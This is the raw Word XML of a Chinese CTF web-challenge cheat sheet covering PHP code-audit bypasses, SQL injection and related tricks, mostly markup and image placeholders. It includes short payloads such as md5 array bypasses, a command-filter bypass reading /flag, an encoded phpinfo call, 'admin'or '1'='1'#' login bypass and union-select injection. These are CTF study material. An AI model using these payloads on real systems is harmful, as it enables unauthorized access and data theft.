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bookmarkStart w:id="34" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkStart w:id="0" w:name="_Toc40"/>
      <w:bookmarkStart w:id="1" w:name="_Toc15172"/>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_Toc3195 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc3195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_Toc27789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_Toc27789 \h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_Toc5588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_Toc5588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_Toc7671 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二.PHP代码审计</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7671 \h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_Toc6230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_Toc6230 \h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_Toc21714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_Toc21714 \h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_Toc12489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_Toc12489 \h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_Toc27669 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.盲注</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27669 \h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_Toc586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_Toc586 \h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_Toc1612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_Toc1612 \h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_Toc2455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_Toc2455 \h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_Toc26670 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.PHP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26670 \h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_Toc4020 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.JAVA</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4020 \h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_Toc6452 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.PYTHON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6452 \h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_Toc24237 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.NGINX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24237 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>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_Toc459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_Toc459 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>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_Toc12677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_Toc12677 \h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_Toc15367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_Toc15367 \h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_Toc24730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_Toc24730 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>31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_Toc13066 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>九.PHP序列化</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13066 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>31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_Toc5620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_Toc5620 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>34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_Toc20085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_Toc20085 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>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_Toc29031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_Toc29031 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>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_Toc4769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_Toc4769 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>37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_Toc624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_Toc624 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>37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_Toc9082 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十三. 脚本</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9082 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>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_Toc28202 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.PHP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28202 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>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_Toc18209 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.PYTHON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18209 \h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_Toc2521 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十四. Unicode</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2521 \h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_Toc11979 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十五. Arjun</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11979 \h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_Toc14040 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十六. Javascript</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc14040 \h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_Toc16248 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十六.一些杂七杂八的打法</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16248 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>39</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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc3195"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc27789"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web后门</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc5588"/>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先点击查杀，选择Web目录</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc7671"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二.PHP代码审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>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大数长度限制绕过：采用科学计数法1e9</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md5($a)==md5($b)函数绕过&amp;md5($a)==sha1($b)函数绕过：==为弱类型比较，数组绕过，写a[]=111&amp;b[]=222，md5计算出来为null==null，通过条件，注意a[]得知不能等于b[]的值</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正则表达式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[OC]：匹配字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>::：匹配:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\dt：匹配数字</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/:：不区分大小写匹配</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>O:1:可以改为O:+1实现序列化绕过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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果不存在$text对应的文件，使用?参数名[]=</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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">foreach($_POST as $x =&gt; $y){ </w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$_GET['flag'] === 'flag'绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>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 绕过：tac${IFS}/flag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md5($a)===md5($b)：传入：</w:t>
      </w:r>
    </w:p>
    <w:p>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eval()函数正则绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>读PHPINFO：传入参数名=(~%8F%97%8F%96%91%99%90)();</w:t>
      </w:r>
    </w:p>
    <w:p>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0" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1468075725" r:id="rId9">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5187950" cy="13589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之后将种子按照题目程序写法运行PHP(需要注意版本)得到数据即可</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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="1987550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="1350010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>127.0.0.1绕过：可以试试127.0.0.2或者0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc6230"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三.SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc21714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.单输入框注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查询数据库：1;show databases;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查询数据表：1;show tables;</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登录绕过：admin'or '1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc12489"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.报错注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>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5273040" cy="1913890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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5200650" cy="1771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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1160780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="91122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3898900" cy="27368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或者输入：?参数名=0/**/union/**/select/**/1,2,3,4#</w:t>
      </w:r>
    </w:p>
    <w:p>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5273040" cy="21386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5264150" cy="101727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5264150" cy="103187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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="100774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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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5272405" cy="69913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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="9194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26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2048510" cy="1718310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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28"/>
                    <a:stretch>
